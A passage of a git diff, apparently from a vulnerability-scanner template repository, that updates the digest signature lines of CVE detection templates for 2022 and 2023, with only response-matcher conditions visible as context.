internal: true -# digest: 4a0a00473045022062784fbf42df0ac73bf29c53f7ca94bd834c9c4abcd55a2431131b7700d44db1022100b33b82d8cd5c07fa39ef4a725f4b77733f160d173b1773fecdcb25f4afb5a7a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220039501e44e2210582862ede396ea6d9a3c154c05b10e761073980049ef8755a5022100ce41af9ec2158622d0d1a3badf0b7d0b95d3663c20a954fd028d28a891b21fa7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-27984.yaml b/http/cves/2022/CVE-2022-27984.yaml index b063c00671..55cd0b025f 100644 --- a/http/cves/2022/CVE-2022-27984.yaml +++ b/http/cves/2022/CVE-2022-27984.yaml @@ -54,4 +54,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "components/menu/classes/functions.php")' condition: and -# digest: 4a0a0047304502206696c9f0c64a0b6f9d9f82435f06270a313a9dfeb9556be254936d02e24a5f580221008b7080a04977747d9d72243b59c572448accc8379ad03e88266da09a6e539af6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eb5a06be3573bc91139a9bd8f4866ad40577c66480a8296849fedd94228c120d022100ffbf37e17a634b7c48cf4afa32912147df3aa552185b09c7a69582e3d210f257:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-28032.yaml b/http/cves/2022/CVE-2022-28032.yaml index 81aa40426a..b920bb377a 100644 --- a/http/cves/2022/CVE-2022-28032.yaml +++ b/http/cves/2022/CVE-2022-28032.yaml @@ -43,4 +43,4 @@ http: - 'status_code == 200' - 'contains(body, "Page Deleted")' condition: and -# digest: 490a00463044022035872b6d7631a79d5c0340f1748e96c6f32bb14452d739b7328ab7569395d7410220522677dc575129449d52db8a8b80bad1a914e1cf674585d5dde9e1a75af21971:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100900356560326dfb261205b9801cef45238c799487549c1069e455f1d9b269b49022100c51a5926c29f0b5bbe2351687eddad82f7d85b550f89ab4096dde799b8dae52a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3142.yaml b/http/cves/2022/CVE-2022-3142.yaml index bf470e3c58..1e3d99af9a 100644 --- a/http/cves/2022/CVE-2022-3142.yaml +++ b/http/cves/2022/CVE-2022-3142.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "NEX-Forms")' - 'contains(content_type_2, "text/html")' condition: and -# digest: 490a004630440220245e5b5001d840be2c17fae954a218594d722ae697e66478c6b43212bfc792d60220371c3f59d70e529a7d7cd5f8c8bcdab4416be17edcf2b5326bd3b255cb2631aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206d95501f4e4a068256e32c2f316577c944841dd84d4a694f561323ddae01f3cc022100ffed8c7fbcf9ea760c1e7a3b56a057e63b219943eada72653f3194265ffd7c11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31499.yaml b/http/cves/2022/CVE-2022-31499.yaml index e283dd0d3c..9d2fb9f088 100644 --- a/http/cves/2022/CVE-2022-31499.yaml +++ b/http/cves/2022/CVE-2022-31499.yaml @@ -56,4 +56,4 @@ http: - status_code == 200 - contains(body, '{\"CardNo\":false') condition: and -# digest: 4a0a00473045022100d058fcd6d5713b61b34f3360f00df64a693d00394039aa9b4221e2ff15fecbfd02206ac1b9afe97a8d1ab3685121c6c13be2a42f7a983916a2dc62ab0a8dabcef443:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ebd7afaaa125616a66892f83a9a886facf093934cc42774d2c1b69b579dfc41502207281b7f90ffc6597fa752ee9ba3d495ace42781e20bdcf3cee6d111cf4e09ea1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31976.yaml b/http/cves/2022/CVE-2022-31976.yaml index 74254745ee..b661ce1443 100644 --- a/http/cves/2022/CVE-2022-31976.yaml +++ b/http/cves/2022/CVE-2022-31976.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "status\":\"success\"}")' condition: and -# digest: 4b0a004830460221009fa6f232ca381fb48226af4f083b029784580c4493e408d9152aa86b7fb5ba5b022100d094117a170ce4c1655d880e71f71e166a758c6e334fc23ea1ff6d7bdfc16bd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220678c44cdbf7fc88b1a9af44e6e66a9707c1b35457209b8e0183f6b9b963ecc60022100aec482f693c7e3facb527646e813ad622daa8b82b3f3f0b9a0ab888f7443c471:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31977.yaml b/http/cves/2022/CVE-2022-31977.yaml index 268fb85fd5..101b6e71be 100644 --- a/http/cves/2022/CVE-2022-31977.yaml +++ b/http/cves/2022/CVE-2022-31977.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "status\":\"success\"}")' condition: and -# digest: 4a0a00473045022100d2966f5956585a0efaed31f9b22d39292f964f765ebb98c246982f0c551f5e5602206febf87ebf0b52ed1758f4d39e21b4a8cabf1a463fb7ae53ff7db96e83e7b2bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008233c7e3819fdead92e625be6cd1c45ada93cd2bba642e9998c20c648cb8b5ad022100c048b235c906f2875180b1a9fc884f80688dd324676b59c38b5f29a260f1f360:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31978.yaml b/http/cves/2022/CVE-2022-31978.yaml index 98237bd59b..d5266baa77 100644 --- a/http/cves/2022/CVE-2022-31978.yaml +++ b/http/cves/2022/CVE-2022-31978.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "status\":\"success")' condition: and -# digest: 4b0a0048304602210082920a5d3562240e8e93e567926bda08298baef90f3839368b24000a172d9c4f022100d9c68292bb99fd7bd81974408e1931f6f60e746db4fb80eac1150e70edb76316:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220470314f62d14e462e00ef4f79f5b69ce3f0dcb769a3e4b93134f1b3881f22f4c022100d2c3862e246239772a60aef94e2e631b53614d1356022843ba22199bcacf91d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-33965.yaml b/http/cves/2022/CVE-2022-33965.yaml index db39a92c1e..750246eab3 100644 --- a/http/cves/2022/CVE-2022-33965.yaml +++ b/http/cves/2022/CVE-2022-33965.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022010498ead32ed9ea2f6ed4ad02c4c9979675c0d3013345386dd47c45311f02978022055871fb9107c042ae2c3b99ba818130e6177204137e06b01a1a1184742479f4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bb5a9086f45ab1f0b1a95ba1cb78351ec68e68566799b9351e32c6b026ff54db022100fcea3e398dccc4324e259613ef3a5f8a5385116cfe6836b73e593115eb8b2b9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3768.yaml b/http/cves/2022/CVE-2022-3768.yaml index a5a2cce21b..068f279402 100644 --- a/http/cves/2022/CVE-2022-3768.yaml +++ b/http/cves/2022/CVE-2022-3768.yaml @@ -55,4 +55,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "Batch Mint NFTs")' condition: and -# digest: 480a00453043021f00ac1820f09dc2f52690a5b9e6749ef92e22a4164b6ef2b0e03033c158ac180220057e3a7b9782376145eaccd82f65f8f15e2e8984e22e30e6eb164e83739a90b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ab23bafd554b9f74f96d1458cb6dfe8ea685610644fd8b549d257364ce52cf0b022100ab5ee32915733f6eb9422bad239a2830e7be7d279bcc0b150458b1961ee42f32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3800.yaml b/http/cves/2022/CVE-2022-3800.yaml index 72f58edd29..a9a239a6af 100644 --- a/http/cves/2022/CVE-2022-3800.yaml +++ b/http/cves/2022/CVE-2022-3800.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "usesysid")' condition: and -# digest: 4a0a00473045022100f40394bb2d5157797e74e215fee8236341d3cd73a8b95288eecd312768bf4a5902204f25f965b047e977efe727743133b2934828785b08804aee6eccf4c0acb61376:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022051933d6878da224ebbdf57f9dd29aeaf3c4eb1c8c07651aabdf52da388b902f4022100fae58348f7867071428d5021b9ff03a943084318eb26da0b59e7124d1e09dca6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40032.yaml b/http/cves/2022/CVE-2022-40032.yaml index 734887dc5d..3fda22ef10 100644 --- a/http/cves/2022/CVE-2022-40032.yaml +++ b/http/cves/2022/CVE-2022-40032.yaml @@ -45,4 +45,4 @@ http: - "contains(location, 'login.php')" - 'contains(content_type, "text/html")' condition: and -# digest: 4b0a00483046022100d47bc70d11884729580f9172f27de7d226ef1abff961e2a9e8246e8252674068022100830090a0cd000b966340e2f0446c6b90c0d05bf9b5bbabcfe8fefe29e1bd24c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022047e3a9436b4f4786d0cd59ee506913e451e840d2d6af676191fae6dc0081aa3702207664654b5ed08502db47baf99c03cf1587083d93b0fb7d8c0417fa8f08e5ef67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4049.yaml b/http/cves/2022/CVE-2022-4049.yaml index 11afd80c0e..a1b016e886 100644 --- a/http/cves/2022/CVE-2022-4049.yaml +++ b/http/cves/2022/CVE-2022-4049.yaml @@ -68,4 +68,4 @@ http: regex: - '"wpuser_update_setting":"([0-9a-zA-Z]+)"' internal: true -# digest: 490a004630440220417702a400fd1470847b7a56fdb39c617f098d7ed940760e3bb90b640bffe63002201d2a1c8c55e65250c9a448859cab6a74566bed58996488676a9e4d7bc97113c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201b134a1df10b4743f8036912e65bba72fad6e89500054774ca2696f68e0c5705022100c5828c1e9d325f67d2eba3eb65fabf7c5bab653b07f7abb365a8660cef4fbb59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4050.yaml b/http/cves/2022/CVE-2022-4050.yaml index ab54d781e2..639079e11a 100644 --- a/http/cves/2022/CVE-2022-4050.yaml +++ b/http/cves/2022/CVE-2022-4050.yaml @@ -50,4 +50,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "jscaruselcont jsview2")' condition: and -# digest: 4a0a00473045022100f0f18eda158c5fe7f0c8f8d7e80395bbe52d7bb9fcb75f542a040c53ce757735022054c276ee41a741ecd9a6f40d4d8d52581836eeb81214b9110ca47b6c6149a0be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e678ac372ab4b737ba2abd5eaebcf59a5da44dcff199ba9594574f13646126ef022011ae1d5ab97049f62d9aa534b2191e37ad75b2788bb83a17362123c58a427874:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4059.yaml b/http/cves/2022/CVE-2022-4059.yaml index b513a6baef..b75e4b0298 100644 --- a/http/cves/2022/CVE-2022-4059.yaml +++ b/http/cves/2022/CVE-2022-4059.yaml @@ -48,4 +48,4 @@ http: - 'status_code_1 == 302' - 'contains(body_2, "Cryptocurrency Widgets Pack")' condition: and -# digest: 4a0a0047304502204a68c3a5cbb5de1fbdb1e520c2b1cbbbc7069afe1638289d5c09440a45fcdce3022100a6a65a2506ec6dcf265e4264783cec5d3a1cfdaa0560b0b9444d2d8174f2066d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ed50f5f8c5ae6bf5855baaa834e63b22cf86ee6d58b68fe55b8556de331a09a002201204bd0582628168e707528e8b1557df24cae6d3477a45ba5c3a05d323b8d59e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4117.yaml b/http/cves/2022/CVE-2022-4117.yaml index d0354c3393..c5277c9bf2 100644 --- a/http/cves/2022/CVE-2022-4117.yaml +++ b/http/cves/2022/CVE-2022-4117.yaml @@ -49,4 +49,4 @@ http: - 'status_code == 200' - 'contains(body, "\"status\":200") && contains(body, "{\"html\":")' condition: and -# digest: 4a0a0047304502202704d1c9461ae76669983a31346667ea111b788f256f839824cbf7cf4827f63c0221008e40f7f3f0e50e9046c12b23cd755969d0e2634902e73a21392d7655069691fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f69c37f0d25db7b159f9b8656dbff69f05a51644efb137fed7f8d23910d5e91202202224536f86fa4a828d4659a2abd3118a82ba07a72a66a6ddbecde7a4a3f5e2b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44290.yaml b/http/cves/2022/CVE-2022-44290.yaml index 3b9aded4e6..cbca0597db 100644 --- a/http/cves/2022/CVE-2022-44290.yaml +++ b/http/cves/2022/CVE-2022-44290.yaml @@ -63,4 +63,4 @@ http: - contains(header, "text/html") - contains(body, 'Delete the following?') condition: and -# digest: 4a0a0047304502210085b42f8dbd813c96278a0624ae4a965cdc783df9e3aa63049b454bd2ae602013022029dbcaa2e3817680a0953759908166cd302d0bd893beb86fc9f17de74ff7b75f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c3d0be2198de51a35443c1fc4252af9f514f6c011f4f547033164bbe02501231022100fbf62cdde35b9ffe18780ed1ca39163efdc89ff7a4eb6b823cd3229882082394:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44291.yaml b/http/cves/2022/CVE-2022-44291.yaml index c13f8fabb4..f499536f2a 100644 --- a/http/cves/2022/CVE-2022-44291.yaml +++ b/http/cves/2022/CVE-2022-44291.yaml @@ -64,4 +64,4 @@ http: - 'contains(header_2, "text/html")' - 'contains(body_1, "webTareasSID")' condition: and -# digest: 4a0a00473045022100f9fa6e7b1841bcd70d3d68bb92ef27362bce875c298bee65f81acae33f5c999902201fc68f4f443a20fecb39c3509c24b3634548412e25006cef58d5867b3cbfc6e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202a5cee2948e0a920e287996ddce38797dbcaa07d95c02af06b5e0d3d976a874202206e3b51ce8c879fecfbe618905cad8d98d1b830f2ded44ddb44d4d991ff9da60d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-45805.yaml b/http/cves/2022/CVE-2022-45805.yaml index 8a7965ed39..9380f284b1 100644 --- a/http/cves/2022/CVE-2022-45805.yaml +++ b/http/cves/2022/CVE-2022-45805.yaml @@ -51,4 +51,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "toplevel_page_paytm")' condition: and -# digest: 4b0a00483046022100a74234b549831b4e24377282c733bafd074ef02d19d218eff1112a48b29e2eab022100c94f1431b5c09cc148bfdd9942d6fbc7860eec0e17676e3a9ea37e310b8bd7b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cdd5c79c2defb58bad3520397b70db0899d9382ad1a6380f2d97a24efccbe1ea022100985e82ce90a812acf55dff249f8bb0984705c23915d56edd1f836253c9f14c99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0261.yaml b/http/cves/2023/CVE-2023-0261.yaml index 0a994785d5..45cd8cca39 100644 --- a/http/cves/2023/CVE-2023-0261.yaml +++ b/http/cves/2023/CVE-2023-0261.yaml @@ -54,4 +54,4 @@ http: - 'contains(content_type_2, "application/json")' - 'contains(body_2, "\"data\":{")' condition: and -# digest: 4a0a0047304502202cba63b19032eacb33e98f8c5b149b35ccef086fb44efb66696ab7a8c09d0435022100f4c8796c3c0aeaa9cc5d323fa7fcd5cfabcd35a46c056dd4c8a4b95b71032a1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008e2f3b3482c2dedbdc45461d77554afd428daf50964bcb3179ccbfa1cc87b9c1022073f2ff4121e841a596ea365768c38d155baad1f0141eb750d653310041b29e92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0600.yaml b/http/cves/2023/CVE-2023-0600.yaml index 15444215dc..e8b4bd6427 100644 --- a/http/cves/2023/CVE-2023-0600.yaml +++ b/http/cves/2023/CVE-2023-0600.yaml @@ -60,4 +60,4 @@ http: - 'status_code == 200' - 'contains(body, "sleep(6)")' condition: and -# digest: 4a0a0047304502202861c8403d3eb479bb492712f393950224b00196285a91cabc26cfc6df23dd99022100f972e8f4e92362995d0226f6b20acfc5a5f63de38899b1d6a1df02dc0d6349db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206bf700674db9d965b0b50e734b67ca4560cec983c80ff0e0c6661556ce451376022100fb9874442d5a17a381143cc5a336d4783f6956e904ef3474a0547e9b91d33259:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0630.yaml b/http/cves/2023/CVE-2023-0630.yaml index fa599070a8..69a0288249 100644 --- a/http/cves/2023/CVE-2023-0630.yaml +++ b/http/cves/2023/CVE-2023-0630.yaml @@ -55,4 +55,4 @@ http: - 'contains(content_type_2, "application/json")' - 'contains(body_2, "audioShortcodeLibrary")' condition: and -# digest: 490a00463044021f6e2917d0061143f7ca84ab20e377a2d11b3570e0dba465c62353760ed595dc022100e0d617a6ee8a225a4703bbe89d05b0453dc8b7c3ced1a6bf01c23ebeb744d6ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a0b491144f8ad08cc0fbf5619cde2159c7d4ef3bf7fcc7884f6465b9d4262b0f022100d420363c17427fdd15bd072ef8a0a3a1561544750b45e583ee2eb6aa4a840634:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0900.yaml b/http/cves/2023/CVE-2023-0900.yaml index 7016fbd79a..7f53f3ccef 100644 --- a/http/cves/2023/CVE-2023-0900.yaml +++ b/http/cves/2023/CVE-2023-0900.yaml @@ -66,4 +66,4 @@ http: regex: - '_wpnonce=([0-9a-z]+)">Log Out' internal: true -# digest: 4b0a00483046022100bf8e9a00df0f8377907f2df5438b99e4a3d36b85f2938b25de0dc3ae5fa9abab022100f49f5afc99d134805292ba1c0c1f07dc7da7076b0bf9292863ecccbb80e562f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100da37ae194016559a5f367ada05f1d8beb322fe666515894af2f238d404a94055022009385f7ab8168f028cff213ae82443e543afb2d64f1434b823188d5942771a8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1408.yaml b/http/cves/2023/CVE-2023-1408.yaml index 73f73628b1..5762dabf7f 100644 --- a/http/cves/2023/CVE-2023-1408.yaml +++ b/http/cves/2023/CVE-2023-1408.yaml @@ -50,4 +50,4 @@ http: - 'status_code_2 == 200' - 'contains_all(body_2, "Edit Video","Youtube")' condition: and -# digest: 4a0a00473045022100b5d3d69f571fab56226ee2efc6bf4ad52536adaebc6bc8da1207f7a70d57015a02203f78d2503ccf987c7dc76ae921a1e764d243158a2e833517f6d4585f4ff3d0e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207bb093532f0b69b72c5892e205d39ec196d1b4a294e3b6523eebc80faa543325022100b7f80c3fc73e5e01ae65d46c45420d228221a4418b050562322acb9be1e0c723:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1730.yaml b/http/cves/2023/CVE-2023-1730.yaml index 772bda0bcb..528415e7c7 100644 --- a/http/cves/2023/CVE-2023-1730.yaml +++ b/http/cves/2023/CVE-2023-1730.yaml @@ -44,4 +44,4 @@ http: - 'status_code == 200' - 'contains(body, "supportcandy")' condition: and -# digest: 4a0a00473045022100a7f2d28c6bf94595593025ec52e5895af660c64274a689070f34e319f39889ec022073bba0fe01da7629b66e32798c46291975535b829e30ced65d1cbbe3c4e26711:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022049540e10e472b0b9fbd46e893f020ebb790652a8cc95ced873435e50cc9a0e6502200746ab685e07f423bcc8a55562d3879d64bd052cba0315667f25c638b5b71d07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2130.yaml b/http/cves/2023/CVE-2023-2130.yaml index bf443f2260..d484c67449 100644 --- a/http/cves/2023/CVE-2023-2130.yaml +++ b/http/cves/2023/CVE-2023-2130.yaml @@ -44,4 +44,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, "Supplier Name")' condition: and -# digest: 4b0a004830460221008eedd613cb556e22c44c4adb41769b57907a6fc43c8de121b942339738e6bb6102210093d2e29ef6542d0d18cc3e9a1cbedf51462c61250e47f1a3ed1e83f009a3052e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b7bb5359ebdeea278164614c3ad31fc0c7bb0bfa7b4f3128f427403e01ec21dc022025381c3fa9ce2c20ccd33e0841671bbe73233c6afd67d5bd264e8f327e895824:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23488.yaml b/http/cves/2023/CVE-2023-23488.yaml index d640878909..b9aca487c1 100644 --- a/http/cves/2023/CVE-2023-23488.yaml +++ b/http/cves/2023/CVE-2023-23488.yaml @@ -53,4 +53,4 @@ http: - status_code_1 != 403 # Wordfence - contains(body_2, "pmpro_updates") condition: and -# digest: 490a0046304402207aa83e6f293f332c02d8a9ada084af631fa84e58635b0ee65df029638fbd3409022048777f3132bb7ea017b47e5853e7742ade34d05d38b4da9edd3d8380dd197634:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210098523850f6289a4fee79f8d81bf24872f2f67f76e6f5090f235ba978065679a102205e4348556ff0f3a7ea6807f9032f30c8bbea2b861ad57646e3afe8bbc2b212f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23489.yaml b/http/cves/2023/CVE-2023-23489.yaml index 7173b799d2..8b9360fcf9 100644 --- a/http/cves/2023/CVE-2023-23489.yaml +++ b/http/cves/2023/CVE-2023-23489.yaml @@ -49,4 +49,4 @@ http: - 'status_code_1 == 200' - 'contains(body_1, "[]") && contains(body_2, "Easy Digital Downloads")' condition: and -# digest: 4a0a00473045022100ce855e670e183a3c0c3f09471253246615d2b5faf6c6e9d1156669c259f16abe02202d77885086d1d097ed3172a6980ca5784d9c874d2bd06d38c32e8128a197e0a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a3d6ef32a6dc4313e069a2f2ceee3f24507e1989248ad0ae3d50280a6819742f022100e65265c8eb827d4ee0c0e14ac70be95e35e39e3aae8db62fa5856a582dc35063:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27032.yaml b/http/cves/2023/CVE-2023-27032.yaml index 5a9250c6f9..1a9edd9a23 100644 --- a/http/cves/2023/CVE-2023-27032.yaml +++ b/http/cves/2023/CVE-2023-27032.yaml @@ -63,4 +63,4 @@ http: regex: - ',"static_token":"([0-9a-z]+)",' internal: true -# digest: 490a004630440220505e538de0a7417f495151e7828e4e9c1c60805ab390374202dae077362ff09a02201d031f84949b5d962b16a57aac4c5ab5c30b7785284dfd82a4916a01a3c318bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206b509cee968379a9cc871b3e72c80af9274dde8b378a3a8f7d1d179601d51d41022100f19ff2f4957daf629b0391b34b851ab99452b9ad08d1f332d8a766994504ab92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27034.yaml b/http/cves/2023/CVE-2023-27034.yaml index ca487aa605..dabbe3dda7 100644 --- a/http/cves/2023/CVE-2023-27034.yaml +++ b/http/cves/2023/CVE-2023-27034.yaml @@ -89,4 +89,4 @@ http: - type: dsl dsl: - 'duration>=6' -# digest: 4a0a00473045022028ab9f89208aaa55f48b6f2164f2b1141abecc16d5082cffd5dd0256eedf6ea2022100d119897293074e48443bf5416bbbdae3cc78814550ebf0562898142aed52c111:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c480457bb1b1f1d82d3ae899405a36e677a2e13efa71259238c474ab1e90951b022100c214ef5ce5ff204dae73bd2ec799a1721b068f3fa3911db42d90ebcdcfc20c2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27847.yaml b/http/cves/2023/CVE-2023-27847.yaml index b6a2fd23c6..71e13809b1 100644 --- a/http/cves/2023/CVE-2023-27847.yaml +++ b/http/cves/2023/CVE-2023-27847.yaml @@ -67,4 +67,4 @@ http: name: time-based dsl: - 'duration_2>=6' -# digest: 4b0a00483046022100f364642eb237e464e3e9470b8e91d01a7ac0327f460527dfdad7261850faafd1022100f04460ac96c49422fa0acbe928716dff565d04ef6950ed5bb22a13f714978fce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ee8271677f415ca4c4b08feef9da01311967e2b3edba130957466c852f81abdc02205b5163cdbae603a0d7d2ee225ddf03cb7c0dc41baaa66702977a26a34d94c5ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-28662.yaml b/http/cves/2023/CVE-2023-28662.yaml index 75db515379..66ca07c577 100644 --- a/http/cves/2023/CVE-2023-28662.yaml +++ b/http/cves/2023/CVE-2023-28662.yaml @@ -61,4 +61,4 @@ http: - status_code == 500 - contains(body, 'critical error') condition: and -# digest: 4a0a00473045022100f5944d195a66cc992aa9390c7b6af64403ba94d5415a81b46c6e677979a6341302201fe366b008369ca7e2ec4a8c9d37a12ad2a6c12a4080682b3edb135e95b6e16a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cccd3b5fb22259ec6b86dfee3e0bbefaa11a297d7b3b85874be2449a2003648002205c403856a0210c7922114ea3035f114f181c1fcd282a72d613b47e8df8e33bf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30150.yaml b/http/cves/2023/CVE-2023-30150.yaml index 65ad42d33f..412746cd3a 100644 --- a/http/cves/2023/CVE-2023-30150.yaml +++ b/http/cves/2023/CVE-2023-30150.yaml @@ -51,4 +51,4 @@ http: - 'duration_2>=6' - 'contains(tolower(response_1), "prestashop")' condition: and -# digest: 490a0046304402207a8f24e48eb8c34b78b785efe5f9828431ab577c9bb396aaebe7f1a0309806b902204b21eff9468071042ad0169ffa4bdd7cc7d3fa1f4733467497ddaa3a54f8eafa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100acd9b171770d6093ff85a0229b601276e7bc48fcd8ae04a59d1f864cba42cc56022062615f94c1ed205a2b1bc3923e0680e859709f0319303dcc3368589a449ffc36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3077.yaml b/http/cves/2023/CVE-2023-3077.yaml index 319eb0f9db..3ab11f588f 100644 --- a/http/cves/2023/CVE-2023-3077.yaml +++ b/http/cves/2023/CVE-2023-3077.yaml @@ -57,4 +57,4 @@ http: - 'duration>=6' - 'status_code == 200' condition: and -# digest: 4a0a0047304502210091171dd408267411cabc960e5d1ff9a6cc6299020dff9d29668209282afd775f022051476c3f6fb097be3888576aec86db55ea003b433678d3b51cb06dd8d2f3794d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022020132ef3cad1fff150c395bfb9ce8c6c4b9baaf224aeb9f29532948e038ad4a8022066d0a9f959871e601c9477a2b09fe8f695c71c4d47207f1bbcde088d05176203:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34751.yaml b/http/cves/2023/CVE-2023-34751.yaml index 12289ca986..e9848dafc0 100644 --- a/http/cves/2023/CVE-2023-34751.yaml +++ b/http/cves/2023/CVE-2023-34751.yaml @@ -52,4 +52,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'bloofoxCMS Admincenter') condition: and -# digest: 4a0a0047304502204f402a184b02428f1b3b77596205e4955498c3f9860feb5e216df13d55caad7f0221008ca0a4f3fcef19808e026dd67522e147fa57ea364fe8b1d5b96a3579e23554ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220196382adc081470445b1cb9b84cb0e9b371c84c9b8e36de20de99f9fc7da88a0022024eec7e6bf96d3620468b305f08d4f4340b754e90ca1fad13b15d127732d8ec6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34752.yaml b/http/cves/2023/CVE-2023-34752.yaml index 5139987619..0fee26937e 100644 --- a/http/cves/2023/CVE-2023-34752.yaml +++ b/http/cves/2023/CVE-2023-34752.yaml @@ -54,4 +54,4 @@ http: - contains(header_2, "text/html") - 